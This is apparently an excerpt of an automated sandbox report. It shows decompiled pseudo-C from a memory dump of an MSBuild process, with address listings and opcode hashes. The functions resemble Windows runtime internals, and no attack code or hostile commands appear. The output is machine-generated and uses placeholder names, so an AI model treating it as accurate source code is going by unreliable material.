                                            						if(_t256 != 0x5c) {
                                            							if(_t256 != 0x3f) {
                                            								goto L2;
                                            							} else {
                                            								goto L50;
                                            							}
                                            						} else {
                                            							L50:
                                            							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                            								goto L2;
                                            							} else {
                                            								_t251 = E01043D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                            								_pop(_t319);
                                            								_pop(_t326);
                                            								_pop(_t257);
                                            								return E0104B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                            							}
                                            						}
                                            					} else {
                                            						L2:
                                            						_t260 = _v572;
                                            						goto L3;
                                            					}
                                            				}
                                            				L101:
                                            			}















































































                                            0x00000000
                                            0x00000000
                                            0x010245ca
                                            0x00000000
                                            0x01024247
                                            0x01024247
                                            0x01024247
                                            0x01024249
                                            0x01024249
                                            0x01024249
                                            0x01024251
                                            0x01024251
                                            0x01024257
                                            0x0102425f
                                            0x0102426e
                                            0x01024270
                                            0x0102427a
                                            0x0106e219
                                            0x0106e219
                                            0x01024280
                                            0x01024282
                                            0x01024456
                                            0x010245ea
                                            0x00000000
                                            0x010245f0
                                            0x0106e223
                                            0x00000000
                                            0x0106e223
                                            0x0102445c
                                            0x0102445c
                                            0x00000000
                                            0x0102445c
                                            0x00000000
                                            0x01024288
                                            0x0102428c
                                            0x0106e298
                                            0x01024292
                                            0x01024292
                                            0x0102429e
                                            0x010242a3
                                            0x010242a7
                                            0x010242ac
                                            0x0106e22d
                                            0x010242b2
                                            0x010242b2
                                            0x010242b9
                                            0x010242bc
                                            0x010242c2
                                            0x010242ca
                                            0x010242cd
                                            0x010242cd
                                            0x010242d4
                                            0x0102433f
                                            0x0102433f
                                            0x010242d6
                                            0x010242d6
                                            0x010242d9
                                            0x010242dd
                                            0x010242eb
                                            0x0106e23a
                                            0x010242f1
                                            0x01024305
                                            0x0102430d
                                            0x01024315
                                            0x01024318
                                            0x0102431f
                                            0x01024322
                                            0x0102432e
                                            0x0102433b
                                            0x0102433b
                                            0x00000000
                                            0x0102432e
                                            0x010242eb
                                            0x0102434c
                                            0x0102434e
                                            0x01024352
                                            0x01024359
                                            0x0102435e
                                            0x01024361
                                            0x0102436e
                                            0x0102438a
                                            0x0102438e
                                            0x01024396
                                            0x0102439e
                                            0x010243a1
                                            0x010243ad
                                            0x010243bb
                                            0x010243bb
                                            0x010243ad
                                            0x0102436e
                                            0x010243bf
                                            0x010243c5
                                            0x01024463
                                            0x01024463
                                            0x010243ce
                                            0x010243d5
                                            0x010243d9
                                            0x010243df
                                            0x01024475
                                            0x01024479
                                            0x01024491
                                            0x01024491
                                            0x01024479
                                            0x010243e5
                                            0x010243eb
                                            0x010243f4
                                            0x010243f6
                                            0x010243f9
                                            0x010243fc
                                            0x010243ff
                                            0x010244e8
                                            0x010244ed
                                            0x010244f3
                                            0x0106e247
                                            0x00000000
                                            0x010244f9
                                            0x01024504
                                            0x01024508
                                            0x0102450f
                                            0x0106e269
                                            0x00000000
                                            0x01024515
                                            0x01024519
                                            0x01024531
                                            0x01024534
                                            0x01024537
                                            0x0102453e
                                            0x01024541
                                            0x0102454a
                                            0x0106e255
                                            0x0106e255
                                            0x0106e25b
                                            0x0106e25e
                                            0x0106e261
                                            0x0106e261
                                            0x01024555
                                            0x01024559
                                            0x0102455d
                                            0x0106e26d
                                            0x0106e270
                                            0x0106e274
                                            0x0106e27a
                                            0x0106e27d
                                            0x0106e28e
                                            0x0106e28e
                                            0x01024563
                                            0x01024563
                                            0x01024569
                                            0x01024569
                                            0x00000000
                                            0x0102455d
                                            0x0102450f
                                            0x00000000
                                            0x010244f3
                                            0x010243ff
                                            0x01024405
                                            0x01024405
                                            0x01024405
                                            0x010242ac
                                            0x0102428c
                                            0x01024282
                                            0x01024407
                                            0x0102440d
                                            0x0106e2af
                                            0x0106e2af
                                            0x01024413
                                            0x01024413
                                            0x00000000
                                            0x010241d4
                                            0x00000000
                                            0x010241c3
                                            0x010241bd
                                            0x01024415
                                            0x01024415
                                            0x01024416
                                            0x01024417
                                            0x01024429
                                            0x0102416e
                                            0x0102416e
                                            0x01024175
                                            0x01024498
                                            0x0102449f
                                            0x0106e12d
                                            0x00000000
                                            0x0106e133
                                            0x00000000
                                            0x0106e133
                                            0x010244a5
                                            0x010244a5
                                            0x010244aa
                                            0x00000000
                                            0x010244bb
                                            0x010244ca
                                            0x010244d6
                                            0x010244d7
                                            0x010244d8
                                            0x010244e3
                                            0x010244e3
                                            0x010244aa
                                            0x0102417b
                                            0x0102417b
                                            0x0102417b
                                            0x00000000
                                            0x0102417b
                                            0x01024175
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ca296f0ab6de7dfe9d9602d4e0b5298ee8ef29e27a43c81547df28f8ffd084c
                                            • Instruction ID: 22a3646ebc82793a50bb8c574d4c03ab4dffee68aa8fc0647939fb0eee808b27
                                            • Opcode Fuzzy Hash: 1ca296f0ab6de7dfe9d9602d4e0b5298ee8ef29e27a43c81547df28f8ffd084c
                                            • Instruction Fuzzy Hash: D9F178746083228BC764CF19C480A7ABBE5FF88714F55896EF9C6CB291E734D885CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E010320A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed char _v24;
                                            				intOrPtr _v28;
                                            				signed int _v32;
                                            				void* _v36;
                                            				char _v48;
                                            				signed int _v52;
                                            				signed int _v56;
                                            				unsigned int _v60;
                                            				char _v64;
                                            				unsigned int _v68;
                                            				signed int _v72;
                                            				char _v73;
                                            				signed int _v74;
                                            				char _v75;
                                            				signed int _v76;
                                            				void* _v81;
                                            				void* _v82;
                                            				void* _v89;
                                            				void* _v92;
                                            				void* _v97;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed char _t128;
                                            				void* _t129;
                                            				signed int _t130;
                                            				void* _t132;
                                            				signed char _t133;
                                            				intOrPtr _t135;
                                            				signed int _t137;
                                            				signed int _t140;
                                            				signed int* _t144;
                                            				signed int* _t145;
                                            				intOrPtr _t146;
                                            				signed int _t147;
                                            				signed char* _t148;
                                            				signed int _t149;
                                            				signed int _t153;
                                            				signed int _t169;
                                            				signed int _t174;
                                            				signed int _t180;
                                            				void* _t197;
                                            				void* _t198;
                                            				signed int _t201;
                                            				intOrPtr* _t202;
                                            				intOrPtr* _t205;
                                            				signed int _t210;
                                            				signed int _t215;
                                            				signed int _t218;
                                            				signed char _t221;
                                            				signed int _t226;
                                            				char _t227;
                                            				signed int _t228;
                                            				void* _t229;
                                            				unsigned int _t231;
                                            				void* _t235;
                                            				signed int _t240;
                                            				signed int _t241;
                                            				void* _t242;
                                            				signed int _t246;
                                            				signed int _t248;
                                            				signed int _t252;
                                            				signed int _t253;
                                            				void* _t254;
                                            				intOrPtr* _t256;
                                            				intOrPtr _t257;
                                            				unsigned int _t262;
                                            				signed int _t265;
                                            				void* _t267;
                                            				signed int _t275;
                                            
                                            				_t198 = __ebx;
                                            				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                            				_v68 = __ecx;
                                            				_v73 = 0;
                                            				_t201 = __edx & 0x00002000;
                                            				_t128 = __edx & 0xffffdfff;
                                            				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                            				_v72 = _t128;
                                            				if((_t128 & 0x00000008) != 0) {
                                            					__eflags = _t128 - 8;
                                            					if(_t128 != 8) {
                                            						L69:
                                            						_t129 = 0xc000000d;
                                            						goto L23;
                                            					} else {
                                            						_t130 = 0;
                                            						_v72 = 0;
                                            						_v75 = 1;
                                            						L2:
                                            						_v74 = 1;
                                            						_t226 =  *0x10f8714; // 0x0
                                            						if(_t226 != 0) {
                                            							__eflags = _t201;
                                            							if(_t201 != 0) {
                                            								L62:
                                            								_v74 = 1;
                                            								L63:
                                            								_t130 = _t226 & 0xffffdfff;
                                            								_v72 = _t130;
                                            								goto L3;
                                            							}
                                            							_v74 = _t201;
                                            							__eflags = _t226 & 0x00002000;
                                            							if((_t226 & 0x00002000) == 0) {
                                            								goto L63;
                                            							}
                                            							goto L62;
                                            						}
                                            						L3:
                                            						_t227 = _v75;
                                            						L4:
                                            						_t240 = 0;
                                            						_v56 = 0;
                                            						_t252 = _t130 & 0x00000100;
                                            						if(_t252 != 0 || _t227 != 0) {
                                            							_t240 = _v68;
                                            							_t132 = E01032EB0(_t240);
                                            							__eflags = _t132 - 2;
                                            							if(_t132 != 2) {
                                            								__eflags = _t132 - 1;
                                            								if(_t132 == 1) {
                                            									goto L25;
                                            								}
                                            								__eflags = _t132 - 6;
                                            								if(_t132 == 6) {
                                            									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                            									if( *((short*)(_t240 + 4)) != 0x3f) {
                                            										goto L40;
                                            									}
                                            									_t197 = E01032EB0(_t240 + 8);
                                            									__eflags = _t197 - 2;
                                            									if(_t197 == 2) {
                                            										goto L25;
                                            									}
                                            								}
                                            								L40:
                                            								_t133 = 1;
                                            								L26:
                                            								_t228 = _v75;
                                            								_v56 = _t240;
                                            								__eflags = _t133;
                                            								if(_t133 != 0) {
                                            									__eflags = _t228;
                                            									if(_t228 == 0) {
                                            										L43:
                                            										__eflags = _v72;
                                            										if(_v72 == 0) {
                                            											goto L8;
                                            										}
                                            										goto L69;
                                            									}
                                            									_t133 = E010058EC(_t240);
                                            									_t221 =  *0x10f5cac; // 0x16
                                            									__eflags = _t221 & 0x00000040;
                                            									if((_t221 & 0x00000040) != 0) {
                                            										_t228 = 0;
                                            										__eflags = _t252;
                                            										if(_t252 != 0) {
                                            											goto L43;
                                            										}
                                            										_t133 = _v72;
                                            										goto L7;
                                            									}
                                            									goto L43;
                                            								} else {
                                            									_t133 = _v72;
                                            									goto L6;
                                            								}
                                            							}
                                            							L25:
                                            							_t133 = _v73;
                                            							goto L26;
                                            						} else {
                                            							L6:
                                            							_t221 =  *0x10f5cac; // 0x16
                                            							L7:
                                            							if(_t133 != 0) {
                                            								__eflags = _t133 & 0x00001000;
                                            								if((_t133 & 0x00001000) != 0) {
                                            									_t133 = _t133 | 0x00000a00;
                                            									__eflags = _t221 & 0x00000004;
                                            									if((_t221 & 0x00000004) != 0) {
                                            										_t133 = _t133 | 0x00000400;
                                            									}
                                            								}
                                            								__eflags = _t228;
                                            								if(_t228 != 0) {
                                            									_t133 = _t133 | 0x00000100;
                                            								}
                                            								_t229 = E01044A2C(0x10f6e40, 0x1044b30, _t133, _t240);
                                            								__eflags = _t229;
                                            								if(_t229 == 0) {
                                            									_t202 = _a20;
                                            									goto L100;
                                            								} else {
                                            									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                            									L15:
                                            									_t202 = _a20;
                                            									 *_t202 = _t135;
                                            									if(_t229 == 0) {
                                            										L100:
                                            										 *_a4 = 0;
                                            										_t137 = _a8;
                                            										__eflags = _t137;
                                            										if(_t137 != 0) {
                                            											 *_t137 = 0;
                                            										}
                                            										 *_t202 = 0;
                                            										_t129 = 0xc0000017;
                                            										goto L23;
                                            									} else {
                                            										_t242 = _a16;
                                            										if(_t242 != 0) {
                                            											_t254 = _t229;
                                            											memcpy(_t242, _t254, 0xd << 2);
                                            											_t267 = _t267 + 0xc;
                                            											_t242 = _t254 + 0x1a;
                                            										}
                                            										_t205 = _a4;
                                            										_t25 = _t229 + 0x48; // 0x48
                                            										 *_t205 = _t25;
                                            										_t140 = _a8;
                                            										if(_t140 != 0) {
                                            											__eflags =  *((char*)(_t267 + 0xa));
                                            											if( *((char*)(_t267 + 0xa)) != 0) {
                                            												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                            											} else {
                                            												 *_t140 = 0;
                                            											}
                                            										}
                                            										_t256 = _a12;
                                            										if(_t256 != 0) {
                                            											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                            										}
                                            										_t257 =  *_t205;
                                            										_v48 = 0;
                                            										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                            										_v56 = 0;
                                            										_v52 = 0;
                                            										_t144 =  *( *[fs:0x30] + 0x50);
                                            										if(_t144 != 0) {
                                            											__eflags =  *_t144;
                                            											if( *_t144 == 0) {
                                            												goto L20;
                                            											}
                                            											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                            											goto L21;
                                            										} else {
                                            											L20:
                                            											_t145 = 0x7ffe0384;
                                            											L21:
                                            											if( *_t145 != 0) {
                                            												_t146 =  *[fs:0x30];
                                            												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                            												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                            													_t147 = E01027D50();
                                            													__eflags = _t147;
                                            													if(_t147 == 0) {
                                            														_t148 = 0x7ffe0385;
                                            													} else {
                                            														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                            													}
                                            													__eflags =  *_t148 & 0x00000020;
                                            													if(( *_t148 & 0x00000020) != 0) {
                                            														_t149 = _v72;
                                            														__eflags = _t149;
                                            														if(__eflags == 0) {
                                            															_t149 = 0xfe5c80;
                                            														}
                                            														_push(_t149);
                                            														_push( &_v48);
                                            														 *((char*)(_t267 + 0xb)) = E0103F6E0(_t198, _t242, _t257, __eflags);
                                            														_push(_t257);
                                            														_push( &_v64);
                                            														_t153 = E0103F6E0(_t198, _t242, _t257, __eflags);
                                            														__eflags =  *((char*)(_t267 + 0xb));
                                            														if( *((char*)(_t267 + 0xb)) != 0) {
                                            															__eflags = _t153;
                                            															if(_t153 != 0) {
                                            																__eflags = 0;
                                            																E01087016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                            																L01022400(_t267 + 0x20);
                                            															}
                                            															L01022400( &_v64);
                                            														}
                                            													}
                                            												}
                                            											}
                                            											_t129 = 0;
                                            											L23:
                                            											return _t129;
                                            										}
                                            									}
                                            								}
                                            							}
                                            							L8:
                                            							_t275 = _t240;
                                            							if(_t275 != 0) {
                                            								_v73 = 0;
                                            								_t253 = 0;
                                            								__eflags = 0;
                                            								L29:
                                            								_push(0);
                                            								_t241 = E01032397(_t240);
                                            								__eflags = _t241;
                                            								if(_t241 == 0) {
                                            									_t229 = 0;
                                            									L14:
                                            									_t135 = 0;
                                            									goto L15;
                                            								}
                                            								__eflags =  *((char*)(_t267 + 0xb));
                                            								 *(_t241 + 0x34) = 1;
                                            								if( *((char*)(_t267 + 0xb)) != 0) {
                                            									E01022280(_t134, 0x10f8608);
                                            									__eflags =  *0x10f6e48 - _t253; // 0x0
                                            									if(__eflags != 0) {
                                            										L48:
                                            										_t253 = 0;
                                            										__eflags = 0;
                                            										L49:
                                            										E0101FFB0(_t198, _t241, 0x10f8608);
                                            										__eflags = _t253;
                                            										if(_t253 != 0) {
                                            											L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                            										}
                                            										goto L31;
                                            									}
                                            									 *0x10f6e48 = _t241;
                                            									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                            									__eflags = _t253;
                                            									if(_t253 != 0) {
                                            										_t57 = _t253 + 0x34;
                                            										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                            										__eflags =  *_t57;
                                            										if( *_t57 == 0) {
                                            											goto L49;
                                            										}
                                            									}
                                            									goto L48;
                                            								}
                                            								L31:
                                            								_t229 = _t241;
                                            								goto L14;
                                            							}
                                            							_v73 = 1;
                                            							_v64 = _t240;
                                            							asm("lock bts dword [esi], 0x0");
                                            							if(_t275 < 0) {
                                            								_t231 =  *0x10f8608; // 0x0
                                            								while(1) {
                                            									_v60 = _t231;
                                            									__eflags = _t231 & 0x00000001;
                                            									if((_t231 & 0x00000001) != 0) {
                                            										goto L76;
                                            									}
                                            									_t73 = _t231 + 1; // 0x1
                                            									_t210 = _t73;
                                            									asm("lock cmpxchg [edi], ecx");
                                            									__eflags = _t231 - _t231;
                                            									if(_t231 != _t231) {
                                            										L92:
                                            										_t133 = E01036B90(_t210,  &_v64);
                                            										_t262 =  *0x10f8608; // 0x0
                                            										L93:
                                            										_t231 = _t262;
                                            										continue;
                                            									}
                                            									_t240 = _v56;
                                            									goto L10;
                                            									L76:
                                            									_t169 = E0103E180(_t133);
                                            									__eflags = _t169;
                                            									if(_t169 != 0) {
                                            										_push(0xc000004b);
                                            										_push(0xffffffff);
                                            										E010497C0();
                                            										_t231 = _v68;
                                            									}
                                            									_v72 = 0;
                                            									_v24 =  *( *[fs:0x18] + 0x24);
                                            									_v16 = 3;
                                            									_v28 = 0;
                                            									__eflags = _t231 & 0x00000002;
                                            									if((_t231 & 0x00000002) == 0) {
                                            										_v32 =  &_v36;
                                            										_t174 = _t231 >> 4;
                                            										__eflags = 1 - _t174;
                                            										_v20 = _t174;
                                            										asm("sbb ecx, ecx");
                                            										_t210 = 3 |  &_v36;
                                            										__eflags = _t174;
                                            										if(_t174 == 0) {
                                            											_v20 = 0xfffffffe;
                                            										}
                                            									} else {
                                            										_v32 = 0;
                                            										_v20 = 0xffffffff;
                                            										_v36 = _t231 & 0xfffffff0;
                                            										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                            										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                            									}
                                            									asm("lock cmpxchg [edi], esi");
                                            									_t262 = _t231;
                                            									__eflags = _t262 - _t231;
                                            									if(_t262 != _t231) {
                                            										goto L92;
                                            									} else {
                                            										__eflags = _v72;
                                            										if(_v72 != 0) {
                                            											E0104006A(0x10f8608, _t210);
                                            										}
                                            										__eflags =  *0x7ffe036a - 1;
                                            										if(__eflags <= 0) {
                                            											L89:
                                            											_t133 =  &_v16;
                                            											asm("lock btr dword [eax], 0x1");
                                            											if(__eflags >= 0) {
                                            												goto L93;
                                            											} else {
                                            												goto L90;
                                            											}
                                            											do {
                                            												L90:
                                            												_push(0);
                                            												_push(0x10f8608);
                                            												E0104B180();
                                            												_t133 = _v24;
                                            												__eflags = _t133 & 0x00000004;
                                            											} while ((_t133 & 0x00000004) == 0);
                                            											goto L93;
                                            										} else {
                                            											_t218 =  *0x10f6904; // 0x400
                                            											__eflags = _t218;
                                            											if(__eflags == 0) {
                                            												goto L89;
                                            											} else {
                                            												goto L87;
                                            											}
                                            											while(1) {
                                            												L87:
                                            												__eflags = _v16 & 0x00000002;
                                            												if(__eflags == 0) {
                                            													goto L89;
                                            												}
                                            												asm("pause");
                                            												_t218 = _t218 - 1;
                                            												__eflags = _t218;
                                            												if(__eflags != 0) {
                                            													continue;
                                            												}
                                            												goto L89;
                                            											}
                                            											goto L89;
                                            										}
                                            									}
                                            								}
                                            							}
                                            							L10:
                                            							_t229 =  *0x10f6e48; // 0x0
                                            							_v72 = _t229;
                                            							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                            								E0101FFB0(_t198, _t240, 0x10f8608);
                                            								_t253 = _v76;
                                            								goto L29;
                                            							} else {
                                            								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                            								asm("lock cmpxchg [esi], ecx");
                                            								_t215 = 1;
                                            								if(1 != 1) {
                                            									while(1) {
                                            										_t246 = _t215 & 0x00000006;
                                            										_t180 = _t215;
                                            										__eflags = _t246 - 2;
                                            										_v56 = _t246;
                                            										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                            										asm("lock cmpxchg [edi], esi");
                                            										_t248 = _v56;
                                            										__eflags = _t180 - _t215;
                                            										if(_t180 == _t215) {
                                            											break;
                                            										}
                                            										_t215 = _t180;
                                            									}
                                            									__eflags = _t248 - 2;
                                            									if(_t248 == 2) {
                                            										__eflags = 0;
                                            										E010400C2(0x10f8608, 0, _t235);
                                            									}
                                            									_t229 = _v72;
                                            								}
                                            								goto L14;
                                            							}
                                            						}
                                            					}
                                            				}
                                            				_t227 = 0;
                                            				_v75 = 0;
                                            				if(_t128 != 0) {
                                            					goto L4;
                                            				}
                                            				goto L2;
                                            			}

                                            0x010759a7
                                            0x00000000
                                            0x010759a7
                                            0x0107587d
                                            0x00000000
                                            0x0107588b
                                            0x0107588b
                                            0x01075890
                                            0x01075892
                                            0x01075894
                                            0x01075899
                                            0x0107589b
                                            0x010758a0
                                            0x010758a0
                                            0x010758aa
                                            0x010758b2
                                            0x010758b6
                                            0x010758be
                                            0x010758c6
                                            0x010758c9
                                            0x0107590d
                                            0x01075917
                                            0x0107591a
                                            0x0107591c
                                            0x01075920
                                            0x01075928
                                            0x0107592a
                                            0x0107592c
                                            0x0107592e
                                            0x0107592e
                                            0x010758cb
                                            0x010758cd
                                            0x010758d8
                                            0x010758e0
                                            0x010758f4
                                            0x010758fe
                                            0x010758fe
                                            0x0107593a
                                            0x0107593e
                                            0x01075940
                                            0x01075942
                                            0x00000000
                                            0x01075944
                                            0x01075944
                                            0x01075949
                                            0x0107594e
                                            0x0107594e
                                            0x01075953
                                            0x0107595b
                                            0x01075976
                                            0x01075976
                                            0x0107597a
                                            0x0107597f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01075981
                                            0x01075981
                                            0x01075981
                                            0x01075983
                                            0x01075988
                                            0x0107598d
                                            0x01075991
                                            0x01075991
                                            0x00000000
                                            0x0107595d
                                            0x0107595d
                                            0x01075963
                                            0x01075965
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01075967
                                            0x01075967
                                            0x0107596b
                                            0x0107596d
                                            0x00000000
                                            0x00000000
                                            0x0107596f
                                            0x01075971
                                            0x01075971
                                            0x01075974
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01075974
                                            0x00000000
                                            0x01075967
                                            0x0107595b
                                            0x01075942
                                            0x01075863
                                            0x01032143
                                            0x01032143
                                            0x01032149
                                            0x0103214f
                                            0x010322f1
                                            0x010322f6
                                            0x00000000
                                            0x01032173
                                            0x01032173
                                            0x0103217d
                                            0x01032181
                                            0x01032186
                                            0x010759ae
                                            0x010759b2
                                            0x010759b5
                                            0x010759b7
                                            0x010759ba
                                            0x010759cd
                                            0x010759d1
                                            0x010759d5
                                            0x010759d9
                                            0x010759db
                                            0x00000000
                                            0x00000000
                                            0x010759dd
                                            0x010759dd
                                            0x010759e1
                                            0x010759e4
                                            0x010759e7
                                            0x010759ee
                                            0x010759ee
                                            0x010759f3
                                            0x010759f3
                                            0x00000000
                                            0x01032186
                                            0x0103214f
                                            0x01032106
                                            0x01032266
                                            0x010320d8
                                            0x010320da
                                            0x010320e0
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b126f431b4719927e63065ed2a21b1ad34aa01db00fb03478ec67cdeb67708b6
                                            • Instruction ID: 5163875966a915482b8712ea2df0b0698d669a71fe818a128d6a841a9a7700b6
                                            • Opcode Fuzzy Hash: b126f431b4719927e63065ed2a21b1ad34aa01db00fb03478ec67cdeb67708b6
                                            • Instruction Fuzzy Hash: 57F11431A08341AFE766CF2CC9407AE7BE9AFD5324F0485ADE9D59B281D735D840CB86
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 87%
                                            			E0101D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                            				signed int _v8;
                                            				intOrPtr _v20;
                                            				signed int _v36;
                                            				intOrPtr* _v40;
                                            				signed int _v44;
                                            				signed int _v48;
                                            				signed char _v52;
                                            				signed int _v60;
                                            				signed int _v64;
                                            				signed int _v68;
                                            				signed int _v72;
                                            				signed int _v76;
                                            				intOrPtr _v80;
                                            				signed int _v84;
                                            				intOrPtr _v100;
                                            				intOrPtr _v104;
                                            				signed int _v108;
                                            				signed int _v112;
                                            				signed int _v116;
                                            				intOrPtr _v120;
                                            				signed int _v132;
                                            				char _v140;
                                            				char _v144;
                                            				char _v157;
                                            				signed int _v164;
                                            				signed int _v168;
                                            				signed int _v169;
                                            				intOrPtr _v176;
                                            				signed int _v180;
                                            				signed int _v184;
                                            				intOrPtr _v188;
                                            				signed int _v192;
                                            				signed int _v200;
                                            				signed int _v208;
                                            				intOrPtr* _v212;
                                            				char _v216;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed int _t204;
                                            				void* _t208;
                                            				signed int _t211;
                                            				signed int _t216;
                                            				intOrPtr _t217;
                                            				intOrPtr* _t218;
                                            				signed int _t226;
                                            				signed int _t239;
                                            				signed int* _t247;
                                            				signed int _t249;
                                            				void* _t252;
                                            				signed int _t256;
                                            				signed int _t269;
                                            				signed int _t271;
                                            				signed int _t277;
                                            				signed int _t279;
                                            				intOrPtr _t283;
                                            				signed int _t287;
                                            				signed int _t288;
                                            				void* _t289;
                                            				signed char _t290;
                                            				signed int _t292;
                                            				signed int* _t293;
                                            				signed int _t306;
                                            				signed int _t307;
                                            				signed int _t308;
                                            				signed int _t309;
                                            				signed int _t310;
                                            				intOrPtr _t311;
                                            				intOrPtr _t312;
                                            				signed int _t319;
                                            				signed int _t320;
                                            				signed int* _t324;
                                            				signed int _t337;
                                            				signed int _t338;
                                            				signed int _t339;
                                            				signed int* _t340;
                                            				void* _t341;
                                            				signed int _t344;
                                            				signed int _t348;
                                            				signed int _t349;
                                            				signed int _t351;
                                            				intOrPtr _t353;
                                            				void* _t354;
                                            				signed int _t356;
                                            				signed int _t358;
                                            				intOrPtr _t359;
                                            				signed int _t363;
                                            				signed short* _t365;
                                            				void* _t367;
                                            				intOrPtr _t369;
                                            				void* _t370;
                                            				signed int _t371;
                                            				signed int _t372;
                                            				void* _t374;
                                            				signed int _t376;
                                            				void* _t384;
                                            				signed int _t387;
                                            
                                            				_v8 =  *0x10fd360 ^ _t376;
                                            				_t2 =  &_a20;
                                            				 *_t2 = _a20 & 0x00000001;
                                            				_t287 = _a4;
                                            				_v200 = _a12;
                                            				_t365 = _a8;
                                            				_v212 = _a16;
                                            				_v180 = _a24;
                                            				_v168 = 0;
                                            				_v157 = 0;
                                            				if( *_t2 != 0) {
                                            					__eflags = E01016600(0x10f52d8);
                                            					if(__eflags == 0) {
                                            						goto L1;
                                            					} else {
                                            						_v188 = 6;
                                            					}
                                            				} else {
                                            					L1:
                                            					_v188 = 9;
                                            				}
                                            				if(_t365 == 0) {
                                            					_v164 = 0;
                                            					goto L5;
                                            				} else {
                                            					_t363 =  *_t365 & 0x0000ffff;
                                            					_t341 = _t363 + 1;
                                            					if((_t365[1] & 0x0000ffff) < _t341) {
                                            						L109:
                                            						__eflags = _t341 - 0x80;
                                            						if(_t341 <= 0x80) {
                                            							_t281 =  &_v140;
                                            							_v164 =  &_v140;
                                            							goto L114;
                                            						} else {
                                            							_t283 =  *0x10f7b9c; // 0x0
                                            							_t281 = L01024620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                            							_v164 = _t281;
                                            							__eflags = _t281;
                                            							if(_t281 != 0) {
                                            								_v157 = 1;
                                            								L114:
                                            								E0104F3E0(_t281, _t365[2], _t363);
                                            								_t200 = _v164;
                                            								 *((char*)(_v164 + _t363)) = 0;
                                            								goto L5;
                                            							} else {
                                            								_t204 = 0xc000009a;
                                            								goto L47;
                                            							}
                                            						}
                                            					} else {
                                            						_t200 = _t365[2];
                                            						_v164 = _t200;
                                            						if( *((char*)(_t200 + _t363)) != 0) {
                                            							goto L109;
                                            						} else {
                                            							while(1) {
                                            								L5:
                                            								_t353 = 0;
                                            								_t342 = 0x1000;
                                            								_v176 = 0;
                                            								if(_t287 == 0) {
                                            									break;
                                            								}
                                            								_t384 = _t287 -  *0x10f7b90; // 0x77090000
                                            								if(_t384 == 0) {
                                            									_t353 =  *0x10f7b8c; // 0xac2af0
                                            									_v176 = _t353;
                                            									_t320 = ( *(_t353 + 0x50))[8];
                                            									_v184 = _t320;
                                            								} else {
                                            									E01022280(_t200, 0x10f84d8);
                                            									_t277 =  *0x10f85f4; // 0xac2fe0
                                            									_t351 =  *0x10f85f8 & 1;
                                            									while(_t277 != 0) {
                                            										_t337 =  *(_t277 - 0x50);
                                            										if(_t337 > _t287) {
                                            											_t338 = _t337 | 0xffffffff;
                                            										} else {
                                            											asm("sbb ecx, ecx");
                                            											_t338 =  ~_t337;
                                            										}
                                            										_t387 = _t338;
                                            										if(_t387 < 0) {
                                            											_t339 =  *_t277;
                                            											__eflags = _t351;
                                            											if(_t351 != 0) {
                                            												__eflags = _t339;
                                            												if(_t339 == 0) {
                                            													goto L16;
                                            												} else {
                                            													goto L118;
                                            												}
                                            												goto L151;
                                            											} else {
                                            												goto L16;
                                            											}
                                            											goto L17;
                                            										} else {
                                            											if(_t387 <= 0) {
                                            												__eflags = _t277;
                                            												if(_t277 != 0) {
                                            													_t340 =  *(_t277 - 0x18);
                                            													_t24 = _t277 - 0x68; // 0xac2f78
                                            													_t353 = _t24;
